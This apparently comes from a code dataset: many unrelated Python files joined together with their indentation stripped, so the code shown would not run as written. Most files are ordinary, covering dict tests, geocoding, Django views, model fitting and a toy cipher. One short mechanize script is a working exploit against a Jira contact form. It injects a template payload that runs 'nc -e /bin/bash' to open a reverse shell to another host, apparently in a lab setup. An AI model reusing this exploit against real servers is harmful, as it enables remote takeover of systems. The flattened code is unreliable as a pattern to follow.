self.assertEqual(k1 ^ k2, {(3,3)})
self.assertEqual(k1 ^ k3, {(1,1), (2,2), (4,4)})
def test_missing(self):
from inspect import currentframe, getframeinfo
# Make sure dict doesn't have a __missing__ method
self.assertFalse(hasattr(strdict, "__missing__"))
self.assertFalse(hasattr(strdict({}), "__missing__"))
class D(strdict):
def __init__(self, *args, **kwargs):
super(D, self).__init__(*args, **kwargs)
def __missing__(self, key):
return 42
d = D({'1': 2, '3': 4})
self.assertEqual(d['1'], 2)
self.assertEqual(d['3'], 4)
self.assertNotIn('2', d)
self.assertNotIn('2', d.keys())
self.assertEqual(d['2'], 42)
e = strdict()
with self.assertRaises(KeyError) as c:
e['42']
self.assertEqual(c.exception.args, ('42',))
class F(strdict):
def __init__(self):
# An instance variable __missing__ should have no effect
self.__missing__ = lambda key: None
f = F()
with self.assertRaises(KeyError) as c:
f['42']
self.assertEqual(c.exception.args, ('42',))
class G(strdict):
pass
g = G()
with self.assertRaises(KeyError) as c:
g['42']
self.assertEqual(c.exception.args, ('42',))
def test_tuple_keyerror(self):
# SF #1576657
d = strdict({})
with self.assertRaises(KeyError) as c:
d['1']
def test_resize1(self):
# Dict resizing bug, found by <NAME> in 2.2 CVS development.
# This version got an assert failure in debug build, infinite loop in
# release build. Unfortunately, provoking this kind of stuff requires
# a mix of inserts and deletes hitting exactly the right hash codes in
# exactly the right order, and I can't think of a randomized approach
# that would be *likely* to hit a failing case in reasonable time.
d = strdict({})
for i in range(5):
d[chr(i)] = i
for i in range(5):
del d[chr(i)]
for i in range(5, 9): # i==8 was the problem
d[chr(i)] = i
def test_resize2(self):
# Another dict resizing bug (SF bug #1456209).
# This caused Segmentation faults or Illegal instructions.
class X(str):
def __hash__(self):
return 5
def __eq__(self, other):
if resizing:
d.clear()
return False
d = strdict({})
resizing = False
d[X()] = 1
d[X()] = 2
d[X()] = 3
d[X()] = 4
d[X()] = 5
# now trigger a resize
resizing = True
d['9'] = 6
def test_resize_copy_and_deletion(self):
# test adding a bunch of items and then deleting them
keys = [str(i) for i in range(1000)]
d = strdict()
dcpy = d.copy()
self.assertEqual(d, dcpy)
for k in keys:
d[k] = int(int(k) ** 2)
self.assertEqual(len(d), len(keys))
self.assertNotEqual(d, dcpy)
for k in keys[30:]:
del d[k]
self.assertNotEqual(d, dcpy)
self.assertNotEqual(len(d), len(keys))
for k in (keys[:30])[::-1]:
dcpy[k] = int(int(k) ** 2)
self.assertEqual(d, dcpy)
def _not_tracked(self, t):
# Nested containers can take several collections to untrack
gc.collect()
gc.collect()
self.assertFalse(gc.is_tracked(t), t)
def _tracked(self, t):
self.assertTrue(gc.is_tracked(t), t)
gc.collect()
gc.collect()
self.assertTrue(gc.is_tracked(t), t)
def check_reentrant_insertion(self, mutate):
# This object will trigger mutation of the dict when replaced
# by another value. Note this relies on refcounting: the test
# won't achieve its purpose on fully-GCed Python implementations.
class Mutating:
def __del__(self):
mutate(d)
d = strdict({k: Mutating() for k in 'abcdefghijklmnopqr'})
for k in d.keys():
d[k] = k
def test_reentrant_insertion(self):
# Reentrant insertion shouldn't crash (see issue #22653)
def mutate(d):
d['b'] = 5
self.check_reentrant_insertion(mutate)
def mutate(d):
d.update(self.__dict__)
d.clear()
self.check_reentrant_insertion(mutate)
def mutate(d):
while d:
d.popitem()
self.check_reentrant_insertion(mutate)
def test_equal_operator_modifying_operand(self):
# test fix for seg fault reported in issue 27945 part 3.
dict_a = strdict()
dict_b = strdict()
class X(str):
def __del__(self):
dict_b.clear()
def __eq__(self, other):
dict_a.clear()
return True
def __hash__(self):
return 0
dict_a[X('')] = 0
dict_b[X('')] = X('')
self.assertTrue(dict_a == dict_b)
def test_dictitems_contains_use_after_free(self):
class X:
def __eq__(self, other):
d.clear()
return NotImplemented
d = strdict({'0': set()})
('0', X()) in d.items()
def test_equality_inequality(self):
a = strdict()
b = strdict()
keys = [
("a", 1),
("b", 2),
("c", 3),
("d", 4),
("e", 5),
("f", 6),
("asdffdsaasdf", 7),
("000000000000000000000000", 8),
("asdfdssebsbrssr", "asdfadsaf")
]
a.update(keys)
b.update(keys)
a_cpy = a.copy()
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertTrue(a == a_cpy)
a.clear()
self.assertTrue(a != b)
self.assertFalse(a == b)
for k, v in keys:
a[k] = v
self.assertTrue(a == b)
self.assertFalse(a != b)
b.clear()
b.update(dict(keys))
self.assertTrue(a == b)
self.assertFalse(a != b)
del b['a']
self.assertTrue(a != b)
self.assertFalse(a == b)
b['a'] = a['a'] + 1
self.assertTrue(a != b)
self.assertFalse(a == b)
b['a'] = a['a']
self.assertTrue(a == b)
self.assertFalse(a != b)
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
4916224 | # -*- coding: utf-8 -*-
import numpy
import mab.gd.logging as logging
logger = logging.getLogger("gd.optimize.fitting")
from kaplot import *
class Fitting(object):
def __init__(self, fitter, data, xattr, sigma_xattr, filename):
self.fitter = fitter
self.data = data
self.xattr = xattr
self.sigma_xattr = sigma_xattr
self.filename = filename
def run(self, args, opts, scope):
obj = self.data.load()
xtest = x = getattr(obj, self.xattr)
sigma_x = getattr(obj, self.sigma_xattr)
print x
print sigma_x
#dsa
model = self.fitter.get_model()
if 1:
self.fitter.fit(x, sigma_x)
self.x = [param.get() for param in model.parameters]
for param in model.parameters:
print param.name, param.get()
if 0:
for x, e in zip(x, sigma_x):
y = model.logL(x, e)
print y, x, e
if numpy.isnan(y):
import pdb; pdb.set_trace()
print "x =", self.x
self.save()
else:
self.load()
xmin = -200
xmax = 300
mozaic(2,1,box)
histogram(x, binwidth=2, datamin=xmin, datamax=xmax, normalize=True)
xs = arange(xmin, xmax, 0.5)
logy = [model.logL(x, 0) for x in xs]
graph(xs, exp(logy), color="red")
select(1,0)
N = len(sigma_x)
M = 10000
logLs = []
for j in range(M):
#print j, M
#samples_new = array([model.sample() for i in range(len(samples))])
logL = sum([model.logL(model.sample(), sigma_x[i]) for i in range(N)])
logLs.append(logL)
histogram(logLs, bincount=100, normalize=True)#, datamin=datamin, datamax=datamax, )
logL = sum([model.logL(xtest[i], sigma_x[i]) for i in range(N)])
vline(logL, color="green")
print logL
draw()
def load(self):
logger.info("loading fit parameters from: " + self.filename)
values = numpy.load(self.filename)
for param, value in zip(self.fitter.get_model().parameters, values):
#print param, param.name, value
param.set(value)
#self.fitter.get_model().parameters[-1].set(1)
#self.fitter.get_model().parameters[-1].set(5)
#param.set(0.4)
def save(self):
logger.info("saving fit parameters to: " + self.filename)
values = numpy.save(self.filename, self.x)
| StarcoderdataPython |
6402001 | <filename>parsl/tests/integration/test_channels/test_ssh_file_transport.py<gh_stars>100-1000
import parsl
from parsl.channels.ssh.ssh import SSHChannel as SSH
def connect_and_list(hostname, username):
conn = SSH(hostname, username=username)
ec, out, err = conn.execute_wait("echo $HOSTNAME")
conn.close()
return out
def test_push(conn, fname="test001.txt"):
with open(fname, 'w') as f:
f.write("Hello from parsl.ssh testing\n")
conn.push_file(fname, "/tmp")
ec, out, err = conn.execute_wait("ls /tmp/{0}".format(fname))
print(ec, out, err)
def test_pull(conn, fname="test001.txt"):
local = "foo"
conn.pull_file("/tmp/{0}".format(fname), local)
with open("{0}/{1}".format(local, fname), 'r') as f:
print(f.readlines())
if __name__ == "__main__":
parsl.set_stream_logger()
# This is for testing
conn = SSH("midway.rcc.uchicago.edu", username="yadunand")
test_push(conn)
test_pull(conn)
conn.close()
| StarcoderdataPython |
9759871 | import os
from configobj import ConfigObj
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
config = ConfigObj(
os.path.join(os.path.dirname(BASE_DIR), 'settings.conf')
)
| StarcoderdataPython |
6459452 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import auth_oauth
import ir_config_parameter
import res_config
import res_users
| StarcoderdataPython |
8186394 | import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import odeint
from scipy.optimize import minimize
from scipy.interpolate import interp1d
import warnings
# Import data file
# Column 1 = time (t)
# Column 2 = input (u)
# Column 3 = output (yp)
data = np.loadtxt('data_step_test.csv',delimiter=',')
u0 = data[0,1]
y0 = data[0,2]
xp0 = [y0,0.0]
t = data[:,0].T
u = data[:,1].T
yp = data[:,2].T
# specify number of steps
ns = len(t)
delta_t = t[1]-t[0]
# create linear interpolation of the u data versus time
uf = interp1d(t,u)
def sopdt(x,t,uf,Kp,taus,zeta,thetap):
# Kp = process gain
# taus = second order time constant
# zeta = damping factor
# thetap = model time constant
# ts^2 dy2/dt2 + 2 zeta taus dydt + y = Kp u(t-thetap)
# time-shift u
try:
if (t-thetap) <= 0:
um = uf(0.0)
else:
um = uf(t-thetap)
except:
# catch any error
um = u0
# two states (y and y')
y = x[0] - y0
dydt = x[1]
dy2dt2 = (-2.0*zeta*taus*dydt - y + Kp*(um-u0))/taus**2
return [dydt,dy2dt2]
# simulate model with x=[Km,taum,thetam]
def sim_model(x):
# input arguments
Kp = x[0]
taus = x[1]
zeta = x[2]
thetap = x[3]
# storage for model values
xm = np.zeros((ns,2)) # model
# initial condition
xm[0] = xp0
# loop through time steps
for i in range(0,ns-1):
ts = [delta_t*i,delta_t*(i+1)]
inputs = (uf,Kp,taus,zeta,thetap)
# turn off warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
# integrate SOPDT model
x = odeint(sopdt,xm[i],ts,args=inputs)
xm[i+1] = x[-1]
y = xm[:,0]
return y
# define objective
def objective(x):
# simulate model
ym = sim_model(x)
# calculate objective
obj = 0.0
for i in range(len(ym)):
obj = obj + (ym[i]-yp[i])**2
# return result
return obj
# initial guesses
p0 = np.zeros(4)
p0[0] = 0.45 # Kp
p0[1] = 100.0 # taup
p0[2] = 1.5 # zeta
p0[3] = 0.0 # thetap
# show initial objective
print('Initial SSE Objective: ' + str(objective(p0)))
# optimize Kp, taus, zeta, thetap
# bounds on variables
no_bnd = (-1.0e10, 1.0e10)
low_bnd = (0.01, 1.0e10)
Kp_bnd = (0.0,1.0)
tau_bnd = (20.0,200.0)
zeta_bnd = (1.0,2.0)
dead_time = (0.0,0.0)
bnds = (Kp_bnd, tau_bnd, zeta_bnd, dead_time)
solution = minimize(objective,p0,method='SLSQP',bounds=bnds)
p = solution.x
# show final objective
print('Final SSE Objective: ' + str(objective(p)))
print('Kp: ' + str(p[0]))
print('taup: ' + str(p[1]))
print('zeta: ' + str(p[2]))
print('thetap: ' + str(p[3]))
# calculate model with updated parameters
ym1 = sim_model(p0)
ym2 = sim_model(p)
# plot results
plt.figure()
plt.subplot(2,1,1)
plt.plot(t,ym1,'b-',linewidth=2,label='Initial Guess')
plt.plot(t,ym2,'r--',linewidth=3,label='Optimized SOPDT')
plt.plot(t,yp,'k--',linewidth=2,label='Process Data')
plt.ylabel('Output')
plt.legend(loc='best')
plt.subplot(2,1,2)
plt.plot(t,u,'bx-',linewidth=2)
plt.plot(t,uf(t),'r--',linewidth=3)
plt.legend(['Measured','Interpolated'],loc='best')
plt.ylabel('Input Data')
plt.savefig('results.png')
plt.show()
| StarcoderdataPython |
9695412 | import base64
from Crypto import Random
import json
class SpinnerException(Exception):
pass
class Spinner(object):
def __init__(self, key_matrix):
self._keys = key_matrix
# check key matrix is well formed
num_iterations = len(self._keys)
assert num_iterations > 0
num_bytes = len(self._keys[0][0])
assert num_bytes > 0
for local_keys in self._keys:
assert len(local_keys) == 256
for key in local_keys:
assert len(key) == num_bytes
@classmethod
def generate(cls, num_bytes=256, num_iterations=10):
# explicitly check inputs
if not isinstance(num_bytes, int):
raise SpinnerException('Number of bytes must be an integer.')
if not isinstance(num_iterations, int):
raise SpinnerException('Number of iterations must be an integer.')
if num_bytes <= 0:
raise SpinnerException('Number of bytes must be positive.')
if num_iterations <= 0:
raise SpinnerException('Number of iterations must be positive.')
# create matrix of new keys
m = []
for i in range(num_iterations):
n = []
for c in range(256):
n.append(bytearray(Random.get_random_bytes(num_bytes)))
m.append(n)
# create and return object
return cls(m)
@classmethod
def loads(cls, s):
# load json string into dictionary
j = json.loads(s)
# verify dictionary model, build matrix of keys
m = []
assert 'keys' in j
assert isinstance(j['keys'], list)
num_iters = len(j['keys'])
assert num_iters > 0
first = True
num_bytes = 0
for i in j['keys']:
assert isinstance(i, list)
assert len(i) == 256
m_local = []
for c in i:
b = bytearray(base64.b64decode(c))
if first:
num_bytes = len(b)
assert num_bytes > 0
first = False
else:
assert len(b) == num_bytes
m_local.append(b)
m.append(m_local)
# create and return object
return cls(m)
def dumps(self):
s = '{\n "keys": [\n'
outer_first = True
for local_keys in self._keys:
if not outer_first:
s += ',\n'
outer_first = False
s += ' [\n'
inner_first = True
for key in local_keys:
if not inner_first:
s += ',\n'
inner_first = False
s += ' "%s"' % base64.b64encode(key).decode('utf-8')
s += '\n ]'
s += '\n ]\n}'
return s
@property
def num_bytes(self):
return len(self._keys[0][0])
@property
def num_iterations(self):
return len(self._keys)
def encrypt(self, plaintext):
# explicitly check plaintext before use
if not isinstance(plaintext, bytearray):
raise SpinnerException('Plaintext must be a bytearray.')
num_pt_bytes = len(plaintext)
if num_pt_bytes <= 0:
raise SpinnerException('Plaintext is zero length.')
if num_pt_bytes > self.num_bytes:
raise SpinnerException('Plaintext is too long.')
# do encryption
ct = plaintext
num_iterations = self.num_iterations
for itr in range(num_iterations):
for pos in range(num_pt_bytes):
b = ct[pos]
assert (b >= 0 and b <= 255)
ct = self.xor(ct, self._keys[itr][b])
ct[pos] = b
return ct
def decrypt(self, ciphertext):
# explicitly check ciphertext before use
if not isinstance(ciphertext, bytearray):
raise SpinnerException('Ciphertext must be a bytearray.')
num_ct_bytes = len(ciphertext)
if num_ct_bytes <= 0:
raise SpinnerException('Ciphertext is zero length.')
if num_ct_bytes > self.num_bytes:
raise SpinnerException('Ciphertext is too long.')
# do decryption
pt = ciphertext
num_iterations = self.num_iterations
for itr in range(num_iterations-1, -1, -1):
for pos in range(num_ct_bytes-1, -1, -1):
b = pt[pos]
assert (b >= 0 and b <= 255)
pt = self.xor(pt, self._keys[itr][b])
pt[pos] = b
return pt
@staticmethod
def xor(a, b):
assert isinstance(a, bytearray)
assert isinstance(b, bytearray)
num_bytes = len(a)
assert num_bytes <= len(b)
ret = bytearray()
for i in range(num_bytes):
ret.append(a[i] ^ b[i])
return ret
| StarcoderdataPython |
11393073 | """
:class:`.GoogleV3` is the Google Maps V3 geocoder.
"""
from warnings import warn
import base64
import hashlib
import hmac
from geopy.compat import urlencode
from geopy.geocoders.base import Geocoder, DEFAULT_TIMEOUT, DEFAULT_SCHEME
from geopy.util import logger
from geopy.exc import GeocoderQueryError, GeocoderQuotaExceeded, ConfigurationError
class GoogleV3(Geocoder):
"""
Geocoder using the Google Maps v3 API. Documentation at:
https://developers.google.com/maps/documentation/geocoding/
"""
def __init__(self, domain='maps.googleapis.com', scheme=DEFAULT_SCHEME, # pylint: disable=R0913
client_id=None, secret_key=None, timeout=DEFAULT_TIMEOUT,
proxies=None, protocol=None):
"""
Initialize a customized Google geocoder.
API authentication is only required for Google Maps Premier customers.
:param string domain: Should be the localized Google Maps domain to
connect to. The default is 'maps.google.com', but if you're
geocoding address in the UK (for example), you may want to set it
to 'maps.google.co.uk' to properly bias results.
:param string scheme: Use 'https' or 'http' as the API URL's scheme.
Default is https. Note that SSL connections' certificates are not
verified.
.. versionadded:: 0.97
:param string protocol: Deprecated version of `scheme` argument.
Override scheme, if present.
:param string client_id: If using premier, the account client id.
:param string secret_key: If using premier, the account secret key.
:param dict proxies: If specified, routes this geocoder's requests
through the specified proxy. E.g., {"https": "192.0.2.0"}. For
more information, see documentation on
:class:`urllib2.ProxyHandler`.
.. versionadded:: 0.96
"""
if protocol: # pragma: no cover
warn('protocol argument is deprecated in favor of scheme, to be'
'removed in 0.98')
scheme = protocol or scheme
super(GoogleV3, self).__init__(scheme=scheme, timeout=timeout, proxies=proxies)
if client_id and not secret_key:
raise ConfigurationError('Must provide secret_key with client_id.')
if secret_key and not client_id:
raise ConfigurationError('Must provide client_id with secret_key.')
self.domain = domain.strip('/')
self.scheme = scheme
self.doc = {}
if client_id and secret_key:
self.premier = True
self.client_id = client_id
self.secret_key = secret_key
else:
self.premier = False
self.client_id = None
self.secret_key = None
self.api = '%s://%s/maps/api/geocode/json' % (self.scheme, self.domain)
def _get_signed_url(self, params):
"""
Returns a Premier account signed url. Docs on signature:
https://developers.google.com/maps/documentation/business/webservices/auth#digital_signatures
"""
params['client'] = self.client_id
path = "?".join(('/maps/api/geocode/json', urlencode(params)))
signature = hmac.new(
base64.urlsafe_b64decode(self.secret_key),
path.encode('utf-8'),
hashlib.sha1
)
signature = base64.urlsafe_b64encode(signature.digest()).decode('utf-8')
return '%s://%s%s&signature=%s' % (self.scheme, self.domain, path, signature)
@staticmethod
def _format_components_param(components):
"""
Format the components dict to something Google understands.
"""
return '|'.join(['%s:%s' % (a, b) for a, b in components.items()])
def geocode(self, query, bounds=None, region=None, # pylint: disable=W0221,R0913
components=None,
language=None, sensor=False, exactly_one=True, timeout=None):
"""
Geocode a location query.
:param string query: The address or query you wish to geocode.
:param bounds: The bounding box of the viewport within which
to bias geocode results more prominently.
:type bounds: list or tuple
:param string region: The region code, specified as a ccTLD
("top-level domain") two-character value.
:param dict components: Restricts to an area. Can use any combination
of: route, locality, administrative_area, postal_code, country.
:param string language: The language in which to return results.
:param bool sensor: Whether the geocoding request comes from a
device with a location sensor.
:param bool exactly_one: Return one result or a list of results, if
available.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call only,
the value set during the geocoder's initialization.
.. versionadded:: 0.97
"""
params = {
'address': self.format_string % query,
'sensor': str(sensor).lower()
}
if bounds:
params['bounds'] = bounds
if region:
params['region'] = region
if components:
params['components'] = self._format_components_param(components)
if language:
params['language'] = language
if self.premier is False:
url = "?".join((self.api, urlencode(params)))
else:
url = self._get_signed_url(params)
logger.debug("%s.geocode: %s", self.__class__.__name__, url)
return self._parse_json(self._call_geocoder(url, timeout=timeout), exactly_one)
def reverse(self, query, language=None, # pylint: disable=W0221,R0913
sensor=False, exactly_one=False, timeout=None):
"""
Given a point, find an address.
:param query: The coordinates for which you wish to obtain the
closest human-readable addresses.
:type query: :class:`geopy.point.Point`, list or tuple of (latitude,
longitude), or string as "%(latitude)s, %(longitude)s"
:param string language: The language in which to return results.
:param boolean sensor: Whether the geocoding request comes from a
device with a location sensor.
:param boolean exactly_one: Return one result or a list of results, if
available.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception.
.. versionadded:: 0.97
"""
params = {
'latlng': self._coerce_point_to_string(query),
'sensor': str(sensor).lower()
}
if language:
params['language'] = language
if not self.premier:
url = "?".join((self.api, urlencode(params)))
else:
url = self._get_signed_url(params)
logger.debug("%s.reverse: %s", self.__class__.__name__, url)
return self._parse_json(self._call_geocoder(url, timeout=timeout), exactly_one)
def _parse_json(self, page, exactly_one=True):
'''Returns location, (latitude, longitude) from json feed.'''
places = page.get('results', [])
if not len(places):
self._check_status(page.get('status'))
return None
def parse_place(place):
'''Get the location, lat, lng from a single json place.'''
location = place.get('formatted_address')
latitude = place['geometry']['location']['lat']
longitude = place['geometry']['location']['lng']
return (location, (latitude, longitude))
if exactly_one:
return parse_place(places[0])
else:
return [parse_place(place) for place in places]
@staticmethod
def _check_status(status):
"""
Validates error statuses.
"""
if status == 'ZERO_RESULTS':
# When there are no results, just return.
return
if status == 'OVER_QUERY_LIMIT':
raise GeocoderQuotaExceeded(
'The given key has gone over the requests limit in the 24'
' hour period or has submitted too many requests in too'
' short a period of time.'
)
elif status == 'REQUEST_DENIED':
raise GeocoderQueryError(
'Your request was denied.'
)
elif status == 'INVALID_REQUEST':
raise GeocoderQueryError('Probably missing address or latlng.')
else:
raise GeocoderQueryError('Unknown error.')
| StarcoderdataPython |
3544843 | #!/usr/bin/python
import mechanize
url="http://jira-server:8080/secure/ContactAdministrators!default.jspa"
exploit="$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('nc -e /bin/bash jira-smtp 12345').waitFor()"
br = mechanize.Browser()
br.set_handle_robots(False)
br.open(url)
br.select_form(nr=1)
print br.form
br.form['from'] = "test@jira-smtp"
br.form['details'] = "test"
br.form['subject'] = exploit
br.submit()
| StarcoderdataPython |
6552001 |
from django.contrib import admin
from django.urls import path, include
from rest_framework import routers
from core.views import *
router = routers.DefaultRouter()
router.register('usuarios', UsuarioViewSet)
router.register('grupoVeiculos', Grupo_veiculoViewSet)
router.register('veiculos', VeiculoViewSet)
router.register('seguros', SeguroViewSet)
router.register('reservas', ReservaViewSet)
router.register('manutencao', ManutencaoViewSet)
urlpatterns = [
path('', include(router.urls)),
path('admin/', admin.site.urls),
path('api-auth/', include('rest_framework.urls')),
]
| StarcoderdataPython |
4786 |
def solve(n, red , blue):
rcount = bcount = 0
for i in range(n):
if int(red[i]) > int(blue[i]):
rcount = rcount +1
elif int(red[i]) < int(blue[i]):
bcount = bcount + 1
print( 'RED' if rcount>bcount else ('BLUE' if bcount>rcount else 'EQUAL'))
if __name__ == "__main__":
T = int(input())
for t in range(T):
n = int(input())
red = input()
blue = input()
solve(n, red, blue) | StarcoderdataPython |
3204918 | from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import PasswordChangeForm
from django.contrib.auth import update_session_auth_hash
from django.shortcuts import render
from django.urls import reverse
from ..forms import UserProfileForm
from ..utilities import set_message_and_redirect, set_message
@login_required
def profile(request):
initial_data = {
"first_name": request.user.first_name,
"last_name": request.user.last_name,
"email": request.user.email,
"default_currency": request.user.userprofile.default_currency,
"default_period": request.user.userprofile.default_period,
}
profile_form = UserProfileForm(initial=initial_data)
password_form = PasswordChangeForm(user=request.user)
if request.POST:
if "profile_submit" in request.POST:
profile_form = UserProfileForm(request.POST)
if profile_form.is_valid():
request.user.first_name = profile_form.cleaned_data["first_name"]
request.user.last_name = profile_form.cleaned_data["last_name"]
request.user.email = profile_form.cleaned_data["email"]
request.user.username = profile_form.cleaned_data["email"]
request.user.save()
request.user.userprofile.default_currency = profile_form.cleaned_data["default_currency"]
request.user.userprofile.default_period = profile_form.cleaned_data["default_period"]
request.user.userprofile.save()
return set_message_and_redirect(request, "s|Your profile has been updated succesfully!", reverse("blackbook:profile"))
else:
set_message(request, "f|Your profile could not be saved. Please correct the errors below and try again.")
if "password_submit" in request.POST:
password_form = PasswordChangeForm(request.user, request.POST)
if password_form.is_valid():
password_form.save()
update_session_auth_hash(request, request.user)
return set_message_and_redirect(request, "s|Your password has been changed succesfully!", reverse("blackbook:profile"))
else:
set_message(request, "f|Your password could not be updated. Please correct the errors below and try again.")
return render(request, "blackbook/profile.html", {"profile_form": profile_form, "password_form": password_form}) | StarcoderdataPython |
6700024 | <reponame>yag8009/office_test_team
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : yag8009
# @FileName : read_word
# @Time : 2020/6/13
import docx
import os,zipfile,shutil
def read_word(file_name):
# path = "append/***.docx"
strfile = []
file = docx.Document(file_name)
for p in file.paragraphs:
strfile.append(p.text)
return strfile
def getimage(docdir):
os.chdir(docdir)
dirlist = os.listdir(docdir)
for i in dirlist:
if i.endswith(".docx"): #匹配docx文件
docname = i.split(".") #以“.”做成列表形式
os.rename(i,"%s.ZIP"%docname[0]) #重命名为ZIP格式
f = zipfile.ZipFile("%s.ZIP"%docname[0], 'r')
for file in f.namelist():
if "word" in file:
f.extract(file) #将压缩包里的word文件夹解压出来
f.close()
oldimagedir = r"%s\word\media"%docdir #定义图片文件夹
shutil.copytree(oldimagedir,"%s\%s"%(docdir,docname[0])) #拷贝到新目录,名称为word文件的名字
os.rename("%s.ZIP" % docname[0],"%s.docx"% docname[0]) #将ZIP名字还原为DOCX
shutil.rmtree("%s\word"%docdir) #删除word文件夹
if __name__ == '__main__':
doc = read_word('word_data//夜市摆地摊用什么收银软件和管理库存好.docx')
print(doc) # 输出行数:1075
getimage(r'E:\office_test_team\office_test_interface\spider_dxt_com\fubu_dxt\word_data')
| StarcoderdataPython |
1862972 | def find_mod(path, dic):
"""用字典中的词发现文本模式"""
file_list = os.listdir(path)
word_list = read_dict(dic)
word_count = {}
#用一个字典保存, key为发现的文本模式, 键值为匹配该模式的词典中的词的数目
mod_list = []
#文本模式以列表形式保存
word_match = {}
p = 5
q = 5
for file in file_list:
with open(os.path.join(path, file), 'r', encoding='utf8') as txt_fr:
txt_file = txt_fr.readlines()
#txt_file = modified(txt_fr.read())
for line in txt_file:
line = modified(line)
if len(line) > 0:
for word in word_list:
loc_list = [w.start() for w in re.finditer(word, line)]
for loc in loc_list:
for i in range(1, (p+1)):
for j in range(1,(q+1)):
if loc - i >= 0 and loc + len(word) + j <len(line):
ext_word = line[loc - i: loc + len(word) + j]
ext_wd = some_little_modify(ext_word)
local_ind = ext_wd.index(some_little_modify(word))
try:
#mod = re.compile(ext_wd[:local_ind]+'(\S{%d})'%len(word)+ext_wd[local_ind+len(word):])
mod = (ext_wd[:local_ind], ext_wd[local_ind+len(word):])
except re.error:
print (word + '\t\t' + ext_word + '\n')
if mod not in mod_list:
mod_list.append(mod)
word_match[mod] = {word}
else:
word_match[mod].add(word)
for mod in mod_list:
word_count[mod] = len(word_match[mod])
return mod_list, word_count, word_match
def find_word(path, mod_list, dic):
"""用发现的模式去发现文本中的新词"""
file_list = os.listdir(path)
word_list = read_dict(dic)
mod_count = {}
#键为发现的模式, 相应的值为匹配到的词的数目
mod_match = {}
#键为发现的模式, 相应的值为匹配到的词的集合
new_word = set()
#匹配到的新词的集合
for mod in mod_list:
word_set = set()
for file in file_list:
with open(os.path.join(path, file), 'r', encoding='utf8') as txt_fr:
#txt_file = modified(txt_fr.read())
txt_list = txt_fr.readlines()
for line in txt_list:
line = modified(line)
left_index = [w.end() for w in re.finditer(mod[0], line)]
right_index = [w.start() for w in re.finditer(mod[1], line)]
start = 0
i, j = 0, 0
for i in range(len(left_index)):
if start < len(right_index):
for j in range(start, len(right_index)):
if right_index[j] > left_index[i] and (i == len(left_index)-1 or right_index[j] <= left_index[i+1]):
word = line[left_index[i]: right_index[j]]
if len(word) < 10:
print (word)
print (file)
word_set.add(word)
start += 1
break
elif i < len(left_index) - 1 and right_index[j] > left_index[i+1]:
break
else:
start += 1
#wor_set = wor_set.difference(set(word_list))
num_extract = len(word_set)
mod_count[mod] = num_extract
mod_match[mod] = word_set
new_word = new_word.union(word_set)
new_word = new_word.difference(set(word_list))
return new_word, mod_count, mod_match
# def find_word(path, mod_list, dic):
# """用发现的模式去发现文本中的新词"""
# file_list = os.listdir(path)
# word_list = read_dict(dic)
# mod_count = {}
# #键为发现的模式, 相应的值为匹配到的词的数目
# mod_match = {}
# #键为发现的模式, 相应的值为匹配到的词的集合
# new_word = set()
# #匹配到的新词的集合
# for mod in mod_list:
# wor_set = set()
# for file in file_list:
# with open(os.path.join(path, file), 'r', encoding='utf8') as txt_fr:
# txt_file = txt_fr.read()
# wor_set = wor_set.union(set(re.findall(mod, txt_file)))
# #wor_set = wor_set.difference(set(word_list))
# num_extract = len(wor_set)
# mod_count[mod] = num_extract
# mod_match[mod] = wor_set
# new_word = new_word.union(wor_set)
# new_word = new_word.difference(set(word_list))
# return new_word, mod_count, mod_match
# def find_mod(path, dic):
# """用字典中的词发现文本模式"""
# file_list = os.listdir(path)
# word_list = read_dict(dic)
# word_count = {}
# #用一个字典保存, key为发现的文本模式, 键值为匹配该模式的词典中的词的数目
# mod_list = []
# #文本模式以列表形式保存
# word_match = {}
# for file in file_list:
# with open(os.path.join(path, file), 'r', encoding='utf8') as txt_fr:
# p = 5
# q = 5
# txt_file = modified(txt_fr.read())
# if len(txt_file) > 0:
# for word in word_list:
# loc_list = [w.start() for w in re.finditer(word, txt_file)]
# for loc in loc_list:
# for i in range(1, (p+1)):
# for j in range(1,(q+1)):
# if loc - i >= 0 and loc + len(word) + j <len(txt_file):
# ext_word = txt_file[loc - i: loc + len(word) + j]
# ext_wd = some_little_modify(ext_word)
# local_ind = ext_wd.index(some_little_modify(word))
# try:
# #mod = re.compile(ext_wd[:local_ind]+'(\S{%d})'%len(word)+ext_wd[local_ind+len(word):])
# mod = (ext_wd[:local_ind], ext_wd[local_ind+len(word):])
# except re.error:
# print (word + '\t\t' + ext_word + '\n')
# if mod not in mod_list:
# mod_list.append(mod)
# word_match[mod] = {word}
# else:
# word_match[mod].add(word)
# for mod in mod_list:
# word_count[mod] = len(word_match[mod])
# return mod_list, word_count, word_match
# def find_word(path, mod_list, dic):
# """用发现的模式去发现文本中的新词"""
# file_list = os.listdir(path)
# word_list = read_dict(dic)
# mod_count = {}
# #键为发现的模式, 相应的值为匹配到的词的数目
# mod_match = {}
# #键为发现的模式, 相应的值为匹配到的词的集合
# new_word = set()
# #匹配到的新词的集合
# for mod in mod_list:
# wor_set = set()
# for file in file_list:
# with open(os.path.join(path, file), 'r', encoding='utf8') as txt_fr:
# txt_file = modified(txt_fr.read())
# left_index = [w.start() for w in re.finditer(mod[0], txt_file)]
# right_index = [w.start() for w in re.finditer(mod[1], txt_file)]
# start = 0
# for i in range(len(left_index)):
# for j in range(start, len(right_index)):
# if right_index[j] > left_index[i] and right_index[j] <= left_index[i+1]:
# word = text_file[left_index[i], right_index[j]]
# wor_set.add(word)
# start += 1
# break
# elif right_index[j] > left_index[i+1]:
# break
# else:
# start += 1
# #wor_set = wor_set.difference(set(word_list))
# num_extract = len(wor_set)
# mod_count[mod] = num_extract
# mod_match[mod] = wor_set
# new_word = new_word.union(wor_set)
# new_word = new_word.difference(set(word_list))
# return new_word, mod_count, mod_match
| StarcoderdataPython |
